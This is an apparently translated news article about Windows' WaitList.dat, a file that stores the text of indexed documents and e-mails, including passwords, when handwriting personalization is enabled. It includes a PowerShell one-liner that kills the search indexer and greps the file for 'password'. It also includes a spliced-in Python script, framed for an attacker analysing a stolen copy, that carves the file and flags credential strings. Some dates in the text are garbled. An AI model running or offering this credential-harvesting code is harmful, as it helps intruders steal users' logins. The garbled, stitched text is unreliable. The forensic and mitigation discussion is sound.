Data of Windows user accounts on PCs with touch input support is collected in a separate file
Many notebook models and all-in-one workstations now support touch input. It is added for the user's convenience and to speed up working with the machine. But, as it turned out, systems with touch input enabled have a little-known function that puts their users' data at risk.
This concerns devices running Microsoft's operating system. If a computer with touch input enabled is running Windows, then the user's data, including logins and passwords, is collected in a separate file, almost in plaintext. This does not apply to every Windows PC with touch input, only to those where handwriting recognition is enabled.
It turned out that once handwriting input is activated, the file is updated constantly. The file, WaitList.dat, is created by the system as soon as the handwriting recognition option is enabled.
After that, almost any document or e-mail indexed by Windows Search is saved into that file. It is worth emphasizing that this is not metadata but the textual content of the documents. The user does not need to open the e-mail messages or doc files for the information to migrate into this file: once they have been indexed by the Windows service, everything is stored in that location automatically.
Barnaby Skeggs, an information security specialist and one of the first to discover the problem in Windows, says that WaitList.dat on his PC keeps "squeezing" text out of any text document or e-mail message. And this holds even if the source file is deleted: the information remains stored in WaitList.dat.
"If the source file is deleted, its indexed data continues to be stored in WaitList.dat," says the expert. In theory, this gives ample opportunity to attackers who, for one reason or another, decide to study a particular user's data.
It is worth noting that the problem itself is not a secret. Skeggs first wrote about it in 201?, and his post received minimal attention from technical specialists. As far as one can tell, the topic was treated as a matter for DFIR (digital forensics and incident response) rather than as a security risk for the individual user. Until now, the problem was not widely discussed.
Last month, Skeggs concluded that attackers could, in theory, steal user data without difficulty. For example, if an attacker has access to the targeted system and needs the logins and passwords of the user of the compromised PC, he does not have to hunt all over the disk for scraps of credentials, crack hashes, and so on: it is enough to analyze the WaitList.dat file and extract all the necessary data from it.
Why search the entire disk, especially since many documents may be password-protected? It is enough to copy WaitList.dat and analyze it at leisure on the attacker's own machine.
```powershell
# Stop the indexer so it does not hold the file open, wait briefly, then search the UTF-16LE file for "password"
Stop-Process -Name "SearchIndexer" -Force; Start-Sleep -m 500; Select-String -Path $env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat -Encoding unicode -Pattern "password"
```
- Barnaby Skeggs (@barnabyskeggs) August 2? 2018
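As an added example (not Skeggs' one-liner above and not code from the original article), the following Python script does the same job as the Select-String call in a portable way, so a copied WaitList.dat can be analyzed on another machine: it carves runs of printable UTF-16LE text from the file and flags those mentioning credential-like keywords. It assumes only that the harvested text is stored as UTF-16LE, which is what the -Encoding unicode switch implies; it does not parse the container format of the real file. The sample bytes, the header and separator values in it, and the function names are constructed for illustration.

```python
import re
import sys

# Constructed sample standing in for a copied WaitList.dat. The real file is a
# binary container; the only assumption used here is that harvested text is
# stored as UTF-16LE (the reason for -Encoding unicode in the one-liner).
# The header bytes and separators below are made up and carry no meaning.
SAMPLE_WAITLIST = (
    b"\x01\x00\x00\x00\x10\x00\x00\x00"
    + "Quarterly report draft".encode("utf-16-le")
    + b"\x00\x00\xff\xfe"
    + "VPN password: Tr0ub4dor&3".encode("utf-16-le")
    + b"\x00\x00\x00\x00"
    + "Login: alice@example.com".encode("utf-16-le")
    + b"\x00\x00"
    + b"narrow password=ignored"  # 8-bit text, not UTF-16LE, so it is not carved
)


def carve_utf16le_strings(data, min_len=4):
    """Return every run of at least min_len printable ASCII characters encoded
    as UTF-16LE, i.e. a low byte in 0x20..0x7e followed by a 0x00 high byte.
    Narrow (8-bit) text never matches, which is why a plain 'strings' run or a
    grep without -Encoding unicode misses the harvested content."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def find_credential_hints(data, keywords=("password", "passwd", "login")):
    """Return (keyword, string) pairs for carved strings that contain one of
    the keywords, case-insensitively. Keyword order decides which keyword is
    reported when a string matches more than one."""
    hits = []
    for text in carve_utf16le_strings(data):
        lowered = text.lower()
        for keyword in keywords:
            if keyword in lowered:
                hits.append((keyword, text))
                break
    return hits


def scan_file(path):
    """Carve a copied WaitList.dat from disk. The whole file is read at once:
    it is small, and a chunked reader could split a string across a boundary."""
    with open(path, "rb") as fh:
        return find_credential_hints(fh.read())


if __name__ == "__main__":
    # With a path argument, scan a copied WaitList.dat; otherwise use the sample.
    if len(sys.argv) > 1:
        results = scan_file(sys.argv[1])
    else:
        results = find_credential_hints(SAMPLE_WAITLIST)
    for keyword, text in results:
        print(f"[{keyword}] {text}")
```

Run it as `python carve_waitlist.py <copy of WaitList.dat>`; as in the one-liner, stop SearchIndexer before copying the file so that the indexer is not holding it open. Widening the keyword list (or passing a regular expression instead) is the natural next step for a real triage.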
It is worth noting that the security expert who discovered the problem did not contact Microsoft. He believes this is "not a bug, but a feature", that is, the developers of Windows deliberately designed the system this way. Accordingly, if this is not a vulnerability, the developers are well aware of it and could address it at any time.
According to Skeggs, the default file location is: C:\Users\%User%\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat
If Personalized Handwriting Recognition is not needed, it is best to turn it off permanently. Then indexing will no longer store the contents of every indexed file in WaitList.dat.